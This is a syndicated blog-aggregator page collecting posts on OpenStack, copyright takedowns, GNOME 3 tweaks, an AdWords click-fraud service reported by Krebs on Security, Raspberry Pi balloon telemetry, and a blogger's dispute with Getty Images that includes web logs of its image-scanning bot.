It doesn’t matter which electricity supplier you use to power your television. Simply plug it into the wall and it’ll work just fine. Electricity is also sold by consumption, meaning you’re not paying for power when the television is switched off (except for that pesky standby light). However, your service levels, pricing, billing model and add-on services may vary (“Would you like to bundle your gas supply with that?”).

If you’re unhappy with your current electricity supplier, it may still be a pain, but at least you can switch to another provider without having to buy a new television (freedom of choice) or wiping everything recorded on the DVR (workload portability).

Computing should offer the same consumption model and flexibility as energy, powering your website and online services while only charging for the capacity and resources you actually consume.

Your cloud, your rules

The open source movement is all about transparent code and greater compatibility. And the rapid rise of OpenStack means these open source standards and APIs are becoming accepted as the industry standard. The cloud industry is adapting to be more compatible with OpenStack, making it the natural default for any new cloud service.

And because OpenStack is the accepted standard, it immediately reduces the issues of workload portability and freedom of choice.

Not happy with your cloud provider’s service or pricing? Need an add-on service (such as Hadoop – which is also open source) not offered by your provider? Simply take your website, application or other workload and plug it in somewhere else.

If your organisation is considering a move to the cloud, it is no longer a question of “Should we look into OpenStack?” but instead, “Why on earth wouldn’t we?”

OpenStack puts the user back in control, not the vendor.

The post OpenStack – the open cloud appeared first on Anchor Managed Hosting.

TorrentFreak: Google Protects Chilling Effects From Takedown Notices

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

google-bayEach week many millions of DMCA-style copyright notices are sent to sites and services around the planet. Initially the process flew almost entirely under the radar, with senders and recipients dealing with complaints privately.

In 2001, that began to change with the advent of Chilling Effects, an archive created by activists who had become concerned that increasing volumes of cease-and-desist letters were having a “chilling effect” on speech.

In the decade-and-a-third that followed the archive grew to unprecedented levels, with giants such as Google and Twitter routinely sending received notices to the site for public retrieval.

However, while Chilling Effects strives to maintain free speech, several times a month rightsholders from around the world try to silence the archive in specific ways by asking Google to de-index pages from the site.

As can be seen from the tables below, Home Box Office has tried to de-index Chilling Effects pages 240 times, with Microsoft and NBC Universal making 99 and 65 attempts respectively.

Chilling1

The ‘problem’ for these copyright holders is two-fold. Firstly, Chilling Effects does indeed list millions of URLs that potentially link to infringing content. That does not sit well with copyright holders.

“Because the site does not redact information about the infringing URLs identified in the notices, it has effectively become the largest repository of URLs hosting infringing content on the internet,” the Copyright Alliance’s Sandra Aistars complained earlier this year.

However, what Aistars omits to mention is that Chilling Effects has a huge team of lawyers under the hood who know only too well that their archive receives protection under the law. Chilling Effects isn’t a pirate index, it’s an educational, informational, research resource.

Thanks to Google, which routinely throws out all attempts at removing Chilling Effects URLs from its indexes, we are able to see copyright holder attempts at de-indexing.

Earlier this month, for example, Wild Side Video and their anti-piracy partners LeakID sent this notice to Google aiming to protect their title “Young Detective Dee.” As shown below, the notice contained several Chilling Effects URLs.

chill2

Each URL links to other DMCA notices on Chilling Effects, each sent by rival anti-piracy outfit Remove Your Media on behalf of Well Go USA Entertainment. They also target “Young Detective Dee”. This is an interesting situation that offers the potential for an endless loop, with the anti-piracy companies reporting each others’ “infringing” links on Chilling Effects in fresh notices, each time failing to get them removed.

chilling3

The seeds of the “endless loop” phenomenon were also experienced by HBO for a while, with the anti-piracy company sending notices (such as this one) targeting dozens of Chilling Effects pages listing notices previously sent by the company.

While publishing notices is entirely legal, the potential for these loops really angers some notice senders.

On April 10 this year, one Peter Walley sent a notice to Google complaining that his book was being made available on a “pirate site” without permission. Google removed the link from its indexes but, as is standard practice, linked to the notice on Chilling Effects. This enraged Walley.

chilling4

None of these rantings had any effect, except to place yet another notice on Chilling Effects highlighting where the infringing material could be found.

It’s a lesson others should learn from too.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Easy Steps to Make GNOME 3 More Efficient

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Few Linux desktops have brought about such controversy as GNOME 3. It’s been ridiculed, scorned, and hated since it was first released. Thing is, it’s actually a very good desktop. It’s solid, reliable, stable, elegant, simple… and with a few minor tweaks and additions, it can be made into one of the most efficient and user-friendly desktops on the market.

Of course, what makes for an efficient and/or user-friendly desktop? That is subject to opinion — something everyone has. Ultimately, my goal is to help you gain faster access to the apps and the files you use. Simple. Believe it or not, stepping GNOME 3 up into the world of higher efficiency and user-friendliness is quite an easy task — you just have to know where to look and what to do. I am here to point you in the right directions.

I decided to go about this process by first installing a clean Ubuntu GNOME distribution that included GNOME 3.12. With the GNOME-centric desktop ready to go, it’s time to start tweaking.

Add window buttons

For some unknown reason, the developers of GNOME decided to shrug off the standard window buttons (Close, Minimize, Maximize) in favor of a single Close button. I understand dropping the Maximize button (you can simply drag a window to the top of the screen to maximize it), and you can still reach the Minimize and Maximize actions by right-clicking the titlebar. But that right-click route simply adds steps, so the lack of a Minimize button is a bit confounding. Fortunately, there’s an easy fix. Here’s how:

By default, you should have the GNOME Tweak Tool installed. With this tool you can turn on either (or both) of the Maximize and Minimize buttons (Figure 1).

gnome3-max-min-window

Once added, you’ll see the Minimize button, to the left of the Close button, ready to serve. Your windows are now easier to manage.

From the same tweak tool, you can configure a number of other helpful aspects of GNOME:

  • Set window focus mode

  • Set system fonts

  • Set the GNOME theme

  • Add startup applications

  • Add extensions. 

Add extensions

One of the best features of GNOME 3 is shell extensions. These extensions bring all sorts of handy features to GNOME, and there’s no need to install them from the package manager. Either visit the GNOME Shell Extensions site, search for the extension you want, click its listing, click the On button, and then okay the installation, or add extensions from within the GNOME Tweak Tool (though you’ll find more extensions available through the website).

NOTE: You may have to allow the installation of extensions through your browser. If this is the case, you’ll be given a warning when you first visit the GNOME Shell Extension site. Just click Allow when prompted.

One of the more impressive (and handy) extensions is Dash to Dock. This extension moves the Dash out of the application overview and turns it into a fairly standard dock (Figure 2).

gnome3-dash

As you add applications to the Dash, they will also be added to the Dash to Dock. You also get quick access to the applications overview, by clicking the 6-dotted icon at the bottom of the Dock.

There are plenty of other extensions focused on making GNOME 3 a more efficient desktop. Some of the better extensions include:

  • Recent items: Add a drop-down menu of recently used items to your panel.

  • Search Firefox Bookmarks Provider: Search (and launch) your bookmarks from the Overview.

  • Quicklists: Add a quicklist popup menu to Dash icons (which allows you to quickly open new documents associated with the application, and more).

  • Todo List: Adds a drop-down to the panel that lets you maintain a to-do list.

  • Web Search Dialog: Allows you to quickly search the web by hitting Ctrl+Space and entering a string of text (results appear in a new browser tab). 

Add a complete dock

If Dash to Dock is too limiting for you (say you want a notification area and more), one of my favorite docks is Cairo Dock (Figure 3). This amazing addition to GNOME 3 will go a long way toward improving the efficiency of the desktop. With it, you can add/remove applications, get quick access to shortcuts (folders such as Documents, Downloads, Music, and Videos), and add applets (such as an RSS reader, wi-fi indicator, netspeed, drop-to-share, and more). Cairo Dock also supports themes and OpenGL hardware acceleration.

gnome3 Cairo dock

With Cairo Dock added to GNOME 3, your experience will be made exponentially better. Install this great dock from within your distribution’s package manager.

GNOME 3 doesn’t have to be seen as an inefficient, user UN-friendly, desktop. With just a tiny bit of tweaking, GNOME 3 can be made as powerful and user-friendly as any desktop available.

Krebs on Security: Service Drains Competitors’ Online Ad Budget

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The longer one lurks in the Internet underground, the more difficult it becomes to ignore the harsh reality that for nearly every legitimate online business there is a cybercrime-oriented anti-business. Case in point: Today’s post looks at a popular service that helps crooked online marketers exhaust the Google AdWords budgets of their competitors.

Youtube ads from "GoodGoogle" pitching his AdWords click fraud service.

Youtube ads from “GoodGoogle” pitching his AdWords click fraud service.

AdWords is Google’s paid advertising product, displaying ads on the top or the right side of your screen in search results. Advertisers bid on specific keywords, and those who bid the highest will have their ads show up first when Internet users search for those terms. In turn, advertisers pay Google a small amount each time a user clicks on one of their ads.
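The bid-ranking and per-click billing model described above can be sketched in a few lines. This is a toy model only: the advertiser names, bids, and budget figures are invented, and Google’s real ad rank also weighs quality scores and other factors.

```python
# Toy model of keyword-auction ranking and per-click billing.
# All advertisers, bids, and budgets here are illustrative.

def rank_ads(bids):
    """Return advertisers ordered by bid, highest first."""
    return sorted(bids, key=bids.get, reverse=True)

def charge_click(budgets, advertiser, cost):
    """Deduct one click's cost from an advertiser's daily budget.
    Budget-exhaustion fraud amounts to triggering this repeatedly
    until the budget hits zero and the ads stop showing."""
    budgets[advertiser] = max(0.0, budgets[advertiser] - cost)
    return budgets[advertiser]

bids = {"acme": 2.50, "widgetco": 1.75, "initech": 0.90}
budgets = {"acme": 50.00, "widgetco": 40.00, "initech": 20.00}

print(rank_ads(bids))              # highest bidder takes the top slot
charge_click(budgets, "acme", 2.50)
print(budgets["acme"])             # one click's cost deducted
```

The scams in this article attack each side of that model: AdSense publishers inflate the click counter on their own pages, while AdWords fraudsters drain a rival’s budget through the same per-click deduction.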

One of the more well-known forms of online ad fraud (a.k.a. “click fraud“) involves Google AdSense publishers that automate the clicking of ads appearing on their own Web sites in order to inflate ad revenue. But fraudsters also engage in an opposite scam involving AdWords, in which advertisers try to attack competitors by raising their costs or exhausting their ad budgets early in the day.

Enter “GoodGoogle,” the nickname chosen by one of the more established AdWords fraudsters operating on the Russian-language crime forums.  Using a combination of custom software and hands-on customer service, GoodGoogle promises clients the ability to block the appearance of competitors’ ads.

“Are you tired of the competition in Google AdWords that take your first position and quality traffic,?” reads GoodGoogle’s pitch. “I will help you get rid once and for all competitors in Google Adwords.”

The service, which appears to have been on offer since at least January 2012, provides customers with both a la carte and subscription rates. The prices range from $100 to block between three and ten ad units for 24 hours, to $80 for 15 to 30 ad units. For a flat fee of $1,000, small businesses can use GoodGoogle’s software and service to sideline a handful of competitors’ ads indefinitely. Fees are paid up-front and in virtual currencies (WebMoney, e.g.), and the seller offers support and a warranty for his work for the first three weeks.

Reached via instant message, GoodGoogle declined to specify how his product works, instead referring me to several forums where I could find dozens of happy customers to vouch for the efficacy of the service.

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, speculated that GoodGoogle’s service consists of two main components: A private botnet of hacked computers that do the clicking on ads, and advanced software that controls the clicking activity of the botted computers so that it appears to be done organically from search results.

Further, he said, the click fraud bots probably are not used for any other purpose (such as spam or denial-of-service attacks) since doing so would risk landing those bots on lists of Internet addresses that Google and other large Internet companies use to keep track of abuse complaints.

“You’d pretty much have to do this kind of thing as a service, because if you do it just using software alone, you aren’t going to be able to get a wide variety of traffic,” Weaver said. “Otherwise, you’re going to start triggering alarms.”

Amazingly, the individual responsible for this service not only invokes Google’s trademark in his nickname and advertises his wares via instructional videos on Google’s YouTube service, but he also lists several Gmail accounts as points of contact. My guess is it will not be difficult for Google to shutter this operation, and possibly to identify this individual in real life.

TorrentFreak: US Wants to Criminalize Movie and Music Streaming

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

streamingYesterday the House Judiciary Committee held a hearing on punishments for and remedies against online copyright infringement. One of the speakers was David Bitkower, Acting Deputy Assistant Attorney General, who laid out the wishes of the Obama administration.

After praising previous successes, such as the shutdown of Megaupload and the prosecution of several IMAGiNE members, Bitkower explained the evolving challenges copyright holders are dealing with.

From illegal piano rolls in the early 1900s to floppy disks a century later, new technologies have presented new threats, he argued. With the rise of broadband access this process has worsened and the most recent challenge is combating illegal streaming services.

“One new challenge confronting copyright owners and law enforcement authorities is the rise of Internet ‘streaming’ as the dominant means of disseminating many types of copyrighted content online. This activity also derives from advances in technology: in this case, the growth in availability of high-speed Internet to the average consumer,” Bitkower said.

The problem for the Department of Justice and copyright holders is that these services are harder to prosecute. Technically, streaming doesn’t count as distribution but as a public performance, which can only be charged as a misdemeanor.

The administration tried to remedy this in 2012 through the SOPA and PIPA bills, but these were shelved after public outrage. Many people feared that uploading copyrighted YouTube videos could land them in jail, and took their concerns to the streets.

However, fast forward a few years and the same plan is back on the table.

“The Administration recommends that Congress amend the law to create a felony penalty for unauthorized Internet streaming. Specifically, we recommend the creation of legislation to establish a felony charge for infringement through unauthorized public performances conducted for commercial advantage or private financial gain,” Bitkower explained.

“It would emphasize the seriousness of the threat that unauthorized streaming poses to legitimate copyright holders, clarify the scope of conduct deemed to be illegal in order to deter potential infringers, and provide the Department with an important tool to prosecute and deter illicit Internet streaming.”

In addition to criminalizing illicit streaming, Bitkower also called for persistent funds to support its international operations. In recent years the DoJ has educated police forces abroad to deal with copyright infringement. This apparently includes training on very basic skills, such as how to connect to the Internet in the first place.

“The program has realized numerous successes, including a Ukrainian police officer who, after receiving training, was able to use a dial-up Internet connection from his home computer to bring down the largest illegal file sharing service in his country,” Bitkower said.

The international program helped to shut down Megaupload, but could also target The Pirate Bay through tools such as “diplomatic and trade-based pressure.” Worryingly, the United States has trouble getting the facts right, as it believes that the political Pirate Party is connected to The Pirate Bay.

“In addition to the Mega Conspiracy described above, we have seen The Pirate Bay start as a file sharing site for unauthorized copies of works in Sweden, expand to other countries, and even develop its own political party in Europe,” Bitkower noted.

Mistakes aside, it’s clear that the Obama administration hasn’t lost its focus on copyright infringement.

All recommendations are aimed at more prosecutions, more international pressure and tougher punishments for pirates. Time will tell whether they can get Congress to agree this time around.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Interview with Nathan Willis, GUADEC Keynote Speaker (GNOME News)

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

LWN editor Nathan Willis is giving a keynote talk at the upcoming GUADEC (GNOME Users and Developers European Conference) and was interviewed by GNOME News. Willis’s talk is titled “Should We Teach The Robot To Kill” and will look at free software and the automotive industry. “And, finally, my ultimate goal would be to persuade some people that the free-software community can — and should — take up the challenge and view the car as a first-rate environment where free software belongs. Because there will naturally be lots of little gaps where the different corporate projects don’t quite have every angle covered. But we don’t have to wait for other giant companies to come along and finish the job. We can get involved now, and if we do, then the next generation of automotive software will be stronger for it, both in terms of features and in terms of free-software ideals.” GUADEC is being held in Strasbourg, France July 26–August 1.

Raspberry Pi: Pi in the Sky: hardware for high-altitude balloonists from Dave Akerman

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: Regular readers will be very familiar with the name Dave Akerman. Dave has been sending Raspberry Pis to the stratosphere under weather balloons since we launched the Pi in 2012, and his work in helping schools develop their own in-house space programs has been fantastic to watch. He and his friend Anthony Stirk have just produced a telemetry add-on board for the Raspberry Pi to help schools (and everybody else) reproduce the sort of spectacular results you’ve seen from him before. Here he is to introduce it: over to you, Dave!

High Altitude Ballooning is an increasingly popular hobby (I nearly said that interest has been “ballooning”, but fortunately I stopped myself just in time …), bringing what is termed “near space” within the reach of pretty much anyone who is willing to put in the effort and spend a moderate amount of money.

moon and sky from stratosphere

 

Although it’s possible to successfully fly and retrieve a balloon with a simple GSM/GPS tracker, the chances are that this will end in failure and tears. GSM coverage in the UK is nowhere near 100%, especially in rural areas, which is where we want (and aim) the flights to land. The next step up in reliability and price is a “Spot” tracker, which works solely via satellites, but those don’t work if they land upside down. Also, neither of these solutions will tell you how high the flight got, or record any science data (e.g. temperature, pressure), or indeed tell you anything about the flight until it lands. If you’re lucky. A lost flight is a sad thing indeed.

pic from stratosphere

 

For some countries (e.g. USA, but not the UK), if you are a licensed amateur radio operator you can fly an APRS tracker, in which case the flight will be tracked for you via the ground-based APRS network run by other radio hams. Sadly UK laws prohibit radio hams transmitting from an airborne vehicle, so APRS is out for us.

For these reasons, pretty much everyone involved in the hobby in the UK, and many other countries, uses radio trackers operating in an ISM (Industrial, Scientific and Medical) band where airborne usage is allowed. These work throughout the flight, transmitting GPS co-ordinates plus temperature and anything else that you can add a sensor for. Many radio trackers can also send down live images, meaning that you can see what your flight is seeing without having to wait for it to land. Here’s a diagram showing how telemetry from the flight ends up as a balloon icon on a Google map:

tracking system

 

What’s not shown here is that, provided you tell them, the other balloonists will help track for you. So not only will you be receiving telemetry and images directly via your own radio receiver, but others will be too. All received data is collated on a server, so if you do lose contact with the flight briefly then it doesn’t matter. However, this does not mean you can leave the tracking up to others! You’ll need to receive at the launch site (you have to make sure it’s working!) and also in the chase car once it lands. The expense of doing this is small – a TV dongle for £12 or so will do it, with a £15 aerial and a laptop, ideally with a 3G dongle or tethered to a phone.
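The telemetry these trackers transmit is typically a plain-text sentence in the UKHAS convention: comma-separated fields between a “$$” start marker and a CRC16 checksum, which is what lets any listener verify and upload a received string. Here is a minimal sketch; the callsign and field layout are illustrative, since each flight defines its own format.

```python
# Sketch of a UKHAS-style telemetry sentence as sent by HAB radio
# trackers. Callsign and fields are illustrative, not a real flight.

def crc16_ccitt(data: bytes, crc: int = 0xFFFF) -> int:
    """CRC16-CCITT (poly 0x1021, init 0xFFFF), the checksum used
    over everything between the '$$' and the '*'."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x1021) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc

def build_sentence(callsign, sentence_id, time, lat, lon, alt, temp):
    """Assemble one telemetry string: position plus a sensor field."""
    fields = f"{callsign},{sentence_id},{time},{lat:.5f},{lon:.5f},{alt},{temp:.1f}"
    return f"$${fields}*{crc16_ccitt(fields.encode()):04X}\n"

print(build_sentence("PISKY", 42, "12:34:56", 51.95023, -2.54445, 31000, -48.3))
```

A sentence like this is repeated over the radio link throughout the flight; any receiver that gets a copy with a matching checksum can pass it to the shared server, which is how the collaborative tracking described above works.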

Traditionally, balloonists build their own radio trackers, and for anyone with the skills or the time and ability to learn programming and some digital electronics, this is definitely the most rewarding route to take. Imagine receiving pictures of the Earth from 30km up, using a piece of kit that you designed and built and programmed! So if you are up to this challenge (and I suspect that most people reading are) then I recommend that you do just that. It takes a while, but during the development you’ll have plenty of time to research other aspects of the hobby (how to predict the flight path, and obtain permission, and fill the balloon, etc.). And when you’re done, you can hold in your hand something that is all your own work and has, to all intents and purposes, been to space.

weather balloon bursting

 

For some though, it’s just not practical to develop a new tracker. Or you might be a programming whizz, but not know which end of a soldering iron to pick up. It was with these people in mind that we (myself and Anthony Stirk – another high altitude balloonist) developed our “Pi In The Sky” telemetry board. Our principal aim is to enable schools to launch balloon flights with radio trackers, without having to develop the hardware and software first. It is also our hope that older children and students will write their own software or at least modify the provided (open source) software, perhaps connecting and writing code for extra sensors (the board has an i2c connection for add-ons).

The board and software are based on what I’ve been flying since my first “Pi In The Sky” flight over 2 years ago, so the technology has been very well proven (approximately 18 flights and no losses other than deliberate ones!). So far the board itself has clocked up 5 successful flights, with the released open-source software on 3 of those. Here’s the board mounted to a model B (though we very strongly recommend use of a model A, which consumes less power and weighs less):

Pi in the Sky board

It comes in a kit complete with a GPS antenna, SMA pigtail (from which you can easily make your own radio aerial), stand-offs for a rigid mounting to the Pi board, and battery connectors. Software is on https://github.com/piinthesky, with installation instructions at http://www.pi-in-the-sky.com/index.php?id=support, or there is a pre-built SD card image for the tragically lazy. We do recommend manual installation as you’ll learn a lot.

By now you’re probably itching to buy a board and go fly it next weekend. Please don’t. Well, buy the board by all means, but from the moment you decide that this is the project for you, you should task yourself with finding out all you can about how to make your flight a safe success. For a start, this means learning about applying for flight permission (which, if you want to launch from your garden at the end of an airport runway, isn’t going to be given). Permission is provided together with a NOTAM (NOtice To AirMen) which tells said pilots what/where/when your launch will be, so they can take a different path. You also need to learn about predicting the flight path so that it lands well away from towns or cities or motorways or airports. I hope I don’t need to explain how important all of this is.


 

There’s lots more to learn about too, for example:

  • How to track the flight
  • How to fill a balloon
  • Where to buy the balloon
  • What size balloon? What size parachute? How to tie it all together?

None of this is complicated (it’s not, ahem “rocket science”), but there is a lot to know. Don’t be surprised if the time between “I’ll do it!” and “Wow, I did it!” is measured in months. Several of them. In fact, worry if it’s less than that – this research takes time. We will be producing some teaching materials, but meantime please see the following links:

As for the board, it provides a number of features borne out of a large number of successful flights:

  • Efficient built-in power regulator providing run time of over 20 hours from 4 AA cells (using a model A Pi)
  • Highly sensitive UBlox GPS receiver approved for altitudes up to 50km
  • Temperature compensated, license-free (Europe) frequency agile, 434MHz radio transmitter
  • Temperature sensor
  • Battery voltage monitoring
  • Sockets for external i2c devices, analog input, external temperature sensor
  • Allows use of Raspberry Pi camera
  • Mounting holes and spacers for a solid connection to the Pi
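That 20-hour figure is easy to sanity-check with a back-of-envelope calculation. The capacity, current-draw and efficiency numbers below are assumptions for illustration, not measured values from the board:

```python
# Back-of-envelope battery life estimate for a model A Pi plus tracker.
# All figures are assumptions for illustration, not measurements: good
# AA lithium cells are roughly 2500-3000 mAh, and a model A Pi with GPS
# and a low-power radio might average on the order of 120 mA.

def runtime_hours(capacity_mah: float, avg_current_ma: float,
                  efficiency: float = 0.85) -> float:
    """Estimated run time, allowing for regulator losses."""
    return capacity_mah * efficiency / avg_current_ma

print(round(runtime_hours(2800, 120), 1))
```

With numbers in that ballpark the claimed 20-hour run time is entirely plausible; a model B, drawing noticeably more current, would land well short of it.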

The open-source software provides these features:

  • Radio telemetry with GPS and sensor data using UKHAS standard
  • Radio image download using SSDV standard
  • Multi-threaded to maximize use of the radio bandwidth
  • Variable image size according to altitude
  • Stores full-definition images as well as smaller transmitted images
  • Automatically chooses better images for download
  • Configurable via text file in the Windows-visible partition of the SD card
  • Supplied as github repository with instructions, or SD card image

Finally, anyone interested in high altitude ballooning, using our board or not, should come to the UKHAS Conference on 16th August 2014 at the University of Greenwich. Anthony and I will be presenting our board during the morning sessions, and will run a workshop on the board in the afternoon. For tickets click here.

The Hacker Factor Blog: A Victory for Fair Use

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Last week I reported on a copyright infringement letter that I had received from Getty Images. The extremely hostile letter claimed that I was using a picture in violation of their copyright, ordered me to “cease and desist” using the picture, and demanded that I pay $475 in damages. Various outlets have referred to this letter as trolling and extortion.

Not being an attorney, I contacted my good friend, Mark D. Rasch. Mark is a well-known attorney in the computer security world. Mark headed the United States Department of Justice Computer Crime Unit for nine years and prosecuted cases ranging from computer crime and fraud to digital trespassing and viruses. If you’re old enough, then you remember the Hanover Hackers mentioned in The Cuckoo’s Egg, Robert Morris Jr. (first Internet worm), and Kevin Mitnick — Mark worked all of those prosecutions. He regularly speaks at conferences, appears in news interviews, and has taught cyberlaw to law enforcement and big universities. (If I were a big company looking for a chief privacy officer, I would hire him in a second.)

This letter from Getty had me concerned. But I can honestly say that, in the 12 years that I’ve known him, I have never seen Mark so animated about an issue. I have only ever seen him as a friendly guy who gives extremely informative advice. This time, I saw a side of Mark that I, as a friend, have never experienced. I would never want to be on the other side of the table from him. And even being on the same side was really intimidating. (Another friend told me that Mark has a reputation for being an aggressive bulldog. And this was my first time seeing his teeth.) His first advice to me was very straightforward. He said, “You have three options. One, do nothing. Two, send back a letter, and three, sue them.” Neither of us were fond of option #1. After a little discussion, I decided to do option #2 and prepare for #3.

First I sent the response letter. Then I took Mark’s advice and began to prepare for a lawsuit. Mark wanted me to take the initiative and file for a “Copyright Declaratory Judgment“. (Don’t wait for Getty.) In effect, I wanted the court to declare my use to be Fair Use.

Getty’s Reply

I honestly expected one of three outcomes from my response letter to Getty Images. Either (A) Getty would do nothing, in which case I would file for the Declaratory Judgment, or (B) Getty would respond with their escalation letter, demanding more money (in which case I would still file for the Declaratory Judgment), or (C) Getty would outright sue me, in which case I would respond however my attorney advised.

But that isn’t what happened. Remarkably, Getty backed down! Here’s the letter that they sent me (I’m only censoring email addresses):

From: License Compliance
To: Dr. Neal Krawetz
Subject: [371842247 Hacker Factor ]
Date: Tue, 22 Jul 2014 20:51:13 +0000

Dr. Krawetz:

We have reviewed your email and website and are taking no further action. Please disregard the offer letter that has been presented in this case. If you have any further questions or concerns, please do not hesitate to contact us.

Nancy Monson
Copyright Compliance Specialist
Getty Images Headquarters
605 Fifth Avenue South, Suite 400
Seattle WA 98104 USA
Phone 1 206 925 6125
Fax 1 206 925 5001
[redacted]@gettyimages.com

For more information about the Getty Images License Compliance Program, please visit http://company.gettyimages.com/license-compliance

Helpful information about image copyright rules and how to license stock photos is located at www.stockphotorights.com and Copyright 101.

Getty Images is leading the way in creating a more visual world. Our new embed feature makes it easy, legal, and free for anybody to share some of our images on websites, blogs, and social media platforms.
http://www.gettyimages.com/Creative/Frontdoor/embed

(c)2014 Getty Images, Inc.

PRIVILEGED AND CONFIDENTIAL
This message may contain privileged or confidential information and is intended only for the individual named. If you are not the named addressee or an employee or agent responsible for delivering this message to the intended recipient you should not disseminate, distribute or copy this e-mail or any attachments hereto. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail and any attachments from your system without copying or disclosing the contents. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. Getty Images, 605 5th Avenue South, Suite 400. Seattle WA 98104 USA, www.gettyimages.com. PLEASE NOTE that all incoming e-mails will be automatically scanned by us and by an external service provider to eliminate unsolicited promotional e-mails (“spam”). This could result in deletion of a legitimate e-mail before it is read by its intended recipient at our firm. Please tell us if you have concerns about this automatic filtering.

Mark Rasch also pointed out that Getty explicitly copyrighted their email to me. However, the same Fair Use that permits me to use their pictures also permits me to post their entire email message. And that whole “PRIVILEGED AND CONFIDENTIAL” paragraph? That’s garbage and can be ignored because I never agreed to their terms.

Findings

In preparing to file the Copyright Declaratory Judgment, I performed my due diligence by checking web logs and related files for information pertaining to this case. And since Getty has recanted, I am making some of my findings public.

Automated Filing
First, notice how Getty’s second letter says “We have reviewed your email and website…” This clearly shows up in my web logs. Among other things, people at Getty are the only (non-bot) visitors to access my site via “nealkrawetz.org” — everyone else uses “hackerfactor.com”. In each case, the Getty users initially went directly to my “In The Flesh” blog entry (showing that they were not searching or just browsing my site.) Their automated violation bot also used nealkrawetz.org. The big catch is that nobody at Getty ever reviewed “In The Flesh” prior to mailing their extortion letter.

In fact, I can see exactly when their bot visited my web site. Here are all of my logs related to their bot:

2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:44 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | http://ops.picscout.com/QcApp/PreReport/Index/371842247?normalFlow=True
2014-06-14 23:06:39 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/categories/18-Phones | http://ops.picscout.com/QcApp/Infringer/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247

This listing shows:

  • The date/time (in PST)
  • The bot’s IP address (two in Israel and one in India; none from the United States)
  • The user-agent string sent by the bot
  • Where they went — most requests went to “/” (my homepage), but exactly one went to “/blog/index.php?/archives/423-In-The-Flesh.html”. That’s when they compiled their complaint.
  • The “Referer” string, showing what they clicked in order to get to my site. Notice how their accesses are associated with a couple of complaint numbers. “371842247” is the number associated with their extortion letter. However, “371654690” appears to be a second potential complaint.

Getty’s complaint has a very specific timestamp on the letter. It doesn’t just have a date. Instead, it says “7/10/2014 11:05:05am” — a very specific time. The clocks may be off by a few seconds, but that “11:05” matches my log file — it is off by exactly 12 hours. (The letter is timestamped 11:05am, and my logs recorded 11:05pm.) This shows that the entire filing process is automated.

When I use my bank’s online bill-pay system, it asks me when I want to have the letter delivered. Within the United States, it usually means mailing the letter four days earlier. I believe that Getty did the exact same thing. They scanned my web site and then mailed their letter so it would be delivered exactly one-month later, and dated the letter 4 days 12 hours before delivery.

Getty’s automated PicScout system is definitely a poorly-behaved web bot. At no time did Getty’s PicScout system retrieve my robots.txt file, showing that it fails to abide by Internet standards. I am also certain that this was a bot since a human’s web browser would have downloaded my blog’s CSS style sheet. (PicScout only downloaded the web page.)
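Spotting this sort of misbehaviour in your own logs is straightforward. The sketch below assumes the same pipe-delimited log format shown in the listing above and flags clients that fetch pages but never request /robots.txt or a stylesheet — the two telltales just described. The function name is mine, not part of any real tool:

```python
# Sketch: flag clients that behave the way PicScout did - fetching pages
# but never /robots.txt or any CSS file. Each log line is assumed to be
# pipe-delimited: date | IP | user-agent | request | referer.
from collections import defaultdict

def suspect_bots(log_lines):
    requests = defaultdict(list)
    for line in log_lines:
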